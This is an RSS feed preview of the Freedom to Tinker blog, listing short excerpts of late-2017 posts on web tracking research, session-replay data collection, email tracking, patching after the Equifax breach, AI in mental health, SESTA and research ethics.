Subscribe: Freedom to Tinker
http://www.freedom-to-tinker.com/?feed=rss2
Preview: Freedom to Tinker

Freedom to Tinker



Research and expert commentary on digital technologies in public life



Last Build Date: Mon, 20 Nov 2017 17:24:43 +0000

 



No boundaries: Exfiltration of personal data by session-replay scripts

Wed, 15 Nov 2017 14:21:51 +0000

This is the first post in our “No Boundaries” series, in which we reveal how third-party scripts on websites have been extracting personal information in increasingly intrusive ways. [0] by Steven Englehardt, Gunes Acar, and Arvind Narayanan Update: we’ve released our data — the list of sites with session-replay scripts, and the sites where we’ve […]


Media Files:
https://freedom-to-tinker.com/wp-content/uploads/2017/11/user_replay_fullstory_demo.mp4




HOWTO: Protect your small organization against electronic adversaries

Wed, 25 Oct 2017 12:24:28 +0000

October is “cyber security awareness month“. Among other notable announcements, Google just rolled out “advanced protection” — free for any Google account. So, in the spirit of offering pragmatic advice to real users, I wrote a short document that’s meant not for the usual Tinker audience but rather for the sort of person running a […]



The Second Workshop on Technology and Consumer Protection

Fri, 20 Oct 2017 16:26:24 +0000

Arvind Narayanan and I are excited to announce that the Workshop on Technology and Consumer Protection (ConPro ’18) will return in May 2018, once again co-located with the IEEE Symposium on Security and Privacy. The first ConPro brought together researchers from a wide range of disciplines, united by a shared goal of promoting consumer welfare […]



AI Mental Health Care Risks, Benefits, and Oversight: Adam Miner at Princeton

Wed, 18 Oct 2017 20:07:20 +0000

How does AI apply to mental health, and why should we care? Today the Princeton Center for IT Policy hosted a talk by Adam Miner, ann AI psychologist, whose research addresses policy issues in the use, design, and regulation of conversational AI in health. Dr. Miner is an instructor in Stanford’s Department of Psychiatry and […]



Avoid an Equifax-like breach? Help us understand how system administrators patch machines

Wed, 04 Oct 2017 22:59:11 +0000

The recent Equifax breach that leaked around 140 million Americans’ personal information was boiled down to a system patch that was never applied, even after the company was alerted to the vulnerability in March 2017. Our work studying how users manage software updates on desktops and mobile tells a story that keeping machines patched is […]



I never signed up for this! Privacy implications of email tracking

Thu, 28 Sep 2017 18:52:50 +0000

In this post I discuss a new paper that will appear at PETS 2018, authored by myself, Jeffrey Han, and Arvind Narayanan. What happens when you open an email and allow it to display embedded images and pixels? You may expect the sender to learn that you’ve read the email, and which device you used […]



What our students found when they tried to break their bubbles

Tue, 19 Sep 2017 18:59:34 +0000

This is the second part of a two-part series about a class project on online filter bubbles. In this post, where we focus on the results. You can read more about our pedagogical approach and how we carried out the project here. By Janet Xu and Matthew J. Salganik This past spring, we taught an […]



Breaking your bubble

Tue, 19 Sep 2017 18:59:14 +0000

This is the first part of a two-part series about a class project on online filter bubbles. In this post, we talk about our pedagogical approach and how we carried out the project. To read more about the results of the project, go to Part Two. By Janet Xu and Matthew J. Salganik The 2016 […]



SESTA May Encourage the Adoption of Broken Automated Filtering Technologies

Mon, 18 Sep 2017 13:33:21 +0000

The Senate is currently considering the Stop Enabling Sex Traffickers Act (SESTA, S. 1693), with a scheduled hearing tomorrow. In brief, the proposed legislation threatens to roll back aspects of Section 230 of the Communications Decency Act (CDA), which relieve content providers, or so-called “intermediaries” (e.g., Google, Facebook, Twitter) of liability for the content that is hosted on their […]



Getting serious about research ethics: AI and machine learning

Mon, 18 Sep 2017 13:28:11 +0000

[This blog post is a continuation of our series about research ethics in computer science.] The widespread deployment of artificial intelligence and specifically machine learning algorithms causes concern for some fundamental values in society, such as employment, privacy, and discrimination. While these algorithms promise to optimize social and economic processes, research in this area has […]